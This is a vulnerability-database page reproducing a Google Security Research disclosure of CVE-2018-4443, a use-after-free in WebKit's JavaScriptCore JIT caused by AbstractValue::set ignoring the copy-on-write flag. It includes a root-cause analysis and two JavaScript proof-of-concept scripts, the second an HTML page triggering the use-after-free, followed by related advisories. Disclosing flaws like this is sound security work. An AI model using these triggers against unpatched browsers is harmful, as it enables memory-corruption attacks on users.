Lucene search
Google Security ResearchPACKETSTORM:150936HistoryDec 27, 2018 - 12:00 a.m.
WebKit JSC AbstractValue::set Use-After-Free
2018-12-2700:00:00
Google Security Research
packetstormsecurity.com
42
0.936 High
EPSS
Percentile
98.9%
`WebKit: JSC: A bug in AbstractValue::set
CVE-2018-4443
void AbstractValue::set(Graph& graph, RegisteredStructure structure)
{
RELEASE_ASSERT(structure);
m_structure = structure;
m_arrayModes = asArrayModes(structure->indexingType());
m_type = speculationFromStructure(structure.get());
m_value = JSValue();
checkConsistency();
assertIsRegistered(graph);
}
It works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as
writing into an immutable butterfly can be used to bypass write barriers.
I also noticed that the most calls to asArrayModes are using structure->indexingType(). I think that those should be fixed too.
PoC:
// ./jsc --useConcurrentJIT=false ~/test.js
function set(arr, value) {
arr[0] = value;
}
function getImmutableArrayOrSet(get, value) {
let arr = [1];
if (get)
return arr;
set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison.
set({}, 1);
}
function main() {
getImmutableArrayOrSet(true);
for (let i = 0; i < 100; i++) {
getImmutableArrayOrSet(false, {});
}
let arr = getImmutableArrayOrSet(true);
print(arr[0] === 1);
}
main();
PoC 2 (UaF):
<script>
function sleep(ms) {
let s = new Date();
while (new Date() - s < ms) {
}
}
function mark() {
for (let i = 0; i < 40; i++) {
new ArrayBuffer(1024 * 1024 * 1);
}
}
function set(arr, value) {
arr[0] = value;
}
function getImmutableArrayOrSet(get, value) {
let arr = [1];
if (get)
return arr;
set(arr, value);
set({}, 1);
}
function main() {
getImmutableArrayOrSet(true);
for (let i = 0; i < 10000; i++)
getImmutableArrayOrSet(false, {});
sleep(500);
let arr = getImmutableArrayOrSet(true);
mark();
getImmutableArrayOrSet(false, []);
mark();
setTimeout(() => {
try {
alert(arr[0]);
} catch (e) {
alert(e);
}
}, 200);
}
main();
</script>
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: lokihardt
`
Related
prion
prion
Memory corruption
2019-04-03 18:29:00
debiancve
debiancve
CVE-2018-4443
2019-04-03 18:29:00
checkpoint_advisories
checkpoint_advisories
Apple WebKit AbstractValue Set Use After Free (CVE-2018-4443)
2022-11-17 00:00:00
cve
cve
CVE-2018-4443
2019-04-03 18:29:00
zdt
zdt
WebKit JSC AbstractValue::set Use-After-Free Exploit
2018-12-29 00:00:00
osv
osv
CVE-2018-4443
2019-04-03 18:29:16
ubuntucve
ubuntucve
CVE-2018-4443
2019-04-03 00:00:00
nessus
nessus
Apple Safari < 12.0.2 Multiple Vulnerabilities
2019-04-08 00:00:00
openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)
2019-02-01 00:00:00
SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)
2019-01-24 00:00:00
openvas
openvas
SUSE: Security Advisory (SUSE-SU-2019:0146-1)
2021-04-19 00:00:00
openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)
2019-02-01 00:00:00
Apple iCloud Security Updates (HT209346) - Windows
2018-12-06 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2019-01-31 00:00:00
Security update for webkit2gtk3 (moderate)
2019-03-08 00:00:00
Security update for webkit2gtk3 (important)
2019-01-23 00:00:00
apple
apple
About the security content of iCloud for Windows 7.9 - Apple Support
2019-01-23 09:35:36
About the security content of iCloud for Windows 7.9
2018-12-05 00:00:00
About the security content of iTunes 12.9.2 for Windows
2018-12-05 00:00:00
kaspersky
kaspersky
KLA11384 Multiple vulnerabilities in Apple iTunes
2018-12-12 00:00:00